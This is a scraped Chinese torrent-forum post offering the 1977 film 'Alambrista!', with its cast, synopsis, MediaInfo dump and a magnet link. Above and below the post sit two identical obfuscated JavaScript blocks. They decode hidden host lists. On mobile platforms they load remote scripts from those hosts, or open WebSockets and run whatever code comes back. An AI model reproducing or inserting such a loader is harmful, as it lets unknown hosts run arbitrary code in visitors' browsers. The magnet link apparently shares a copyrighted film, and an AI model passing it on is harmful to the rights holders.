阿兰布里斯塔[中文字幕].Alambrista!.1977.1080p.BluRay.DD2.0.x265-10bit 9.65GB

版主小s 1月前 232

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 阿兰布里斯塔 / 非法移民 / Alambrista / ?Alambrista! / The Illegal

◎片 名 Alambrista!

◎年 代 1977

◎产 地 美国

◎类 别 剧情

◎语 言 西班牙语 / 英语

◎上映日期 1977-10-16

◎IMDb链接 https://www.imdb.com/title/tt0075654/

◎豆瓣评分 7.5/10 (179人评价)

◎豆瓣链接 https://movie.douban.com/subject/2295398/

◎片 长 110 分钟

◎导 演 罗伯特·M·扬 Robert M. Young (id:1164272)

◎编 剧 罗伯特·M·扬 Robert M. Young (id:1164272)

◎演 员 Domingo Ambriz Domingo Ambriz (id:1058155)

特立尼达·席尔瓦 Trinidad Silva (id:1144573)

Linda Gillen Linda Gillen (id:1342738)

爱德华·詹姆斯·奥莫斯 Edward James Olmos (id:1031917)

杰里·哈德因 Jerry Hardin (id:1095089)

尤利乌斯?哈里斯 Julius Harris (id:1097756)

尼德·巴蒂 Ned Beatty (id:1010558)

桑德拉·舒尔伯格 Sandra Schulberg (id:1296981)

迈克尔·豪斯曼 Michael Hausman (id:1286234)

迈克尔·马丁·墨菲 Michael Martin Murphey (id:1033596)

罗伯特·M·扬 Robert M. Young (id:1164272)

Tom Hurwitz Tom Hurwitz (id:1287195)

诺曼·巴克利 Norman Buckley (id:1279564)

Edward Beyer Edward Beyer (id:1052731)

莉莉·基尔弗特 Lilly Kilvert (id:1288534)

迈克尔·豪斯曼 Michael Hausman (id:1286234)

◎标 签 美国 / CC / 1977 / 剧情 / 1970s / 美国电影 / 移民 / 被忽视的片子

◎简 介

这是每天都会发生的故事,一个墨西哥农民偷偷穿越国境来到加利福尼亚,努力工作,攒钱,为了将家人送回家乡。这个或许平凡无奇的故事在美国独立电影人罗伯特·M·扬手中变得格外强硬与写实。《非法移民》没有像其他同类题材电影那样流于伤感,而是细腻生动地调查了他们的生存状况,完成了一段扣人心弦的公路之旅,虽不乏政治属性但也没有失去对主角复杂性的展现。影片赢得1978年戛纳电影节金摄影机奖。

◎获奖情况 (共1项)

第31届戛纳电影节 (1978)

金摄影机奖(导演处女作奖)

└──罗伯特·M·扬 (id:1164272)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 16070821675056688296385589750989532253 (0xC1720AEF29BDD9EC5C6F1E3F2632C5D)

  4. Complete name : [email protected]mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.65 GiB

  8. Duration : 1 h 36 min

  9. Overall bit rate : 14.3 Mb/s

  10. Movie name : Alambrista! 1977 1080p BluRay DD2.0 [email protected]

  11. Encoded date : UTC 2021-10-19 04:41:42

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 36 min

  21. Bit rate : 13.6 Mb/s

  22. Width : 1 800 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 5:3

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.292

  31. Stream size : 9.21 GiB (95%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : AC-3

  39. Format/Info : Audio Coding 3

  40. Commercial name : Dolby Digital

  41. Codec ID : A_AC3

  42. Duration : 1 h 36 min

  43. Bit rate mode : Constant

  44. Bit rate : 640 kb/s

  45. Channel(s) : 2 channels

  46. Channel layout : L R

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 31.250 FPS (1536 SPF)

  49. Compression mode : Lossy

  50. Stream size : 443 MiB (4%)

  51. Title : Spanish

  52. Language : Spanish

  53. Service kind : Complete Main

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 35 min

  63. Bit rate : 14.0 kb/s

  64. Count of elements : 1489

  65. Stream size : 9.63 MiB (0%)

  66. Title : CHS

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 35 min

  77. Bit rate : 14.3 kb/s

  78. Count of elements : 1489

  79. Stream size : 9.83 MiB (0%)

  80. Title : CHT

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Menu

  85. 00:00:00.000 : en:Chapter 01

  86. 00:08:39.352 : en:Chapter 02

  87. 00:14:50.723 : en:Chapter 03

  88. 00:18:07.586 : en:Chapter 04

  89. 00:21:31.916 : en:Chapter 05

  90. 00:26:51.819 : en:Chapter 06

  91. 00:32:00.460 : en:Chapter 07

  92. 00:38:20.507 : en:Chapter 08

  93. 00:42:02.603 : en:Chapter 09

  94. 00:43:25.812 : en:Chapter 10

  95. 00:47:20.296 : en:Chapter 11

  96. 00:51:27.001 : en:Chapter 12

  97. 00:56:16.540 : en:Chapter 13

  98. 01:02:08.016 : en:Chapter 14

  99. 01:05:57.787 : en:Chapter 15

  100. 01:10:52.874 : en:Chapter 16

  101. 01:15:00.079 : en:Chapter 17

  102. 01:20:56.143 : en:Chapter 18

  103. 01:23:50.150 : en:Chapter 19

  104. 01:28:50.492 : en:Chapter 20

  105. 01:32:27.500 : en:Chapter 21




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:BE2CDC395329D8BD3D7CB693D3F684AA36EE7414

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};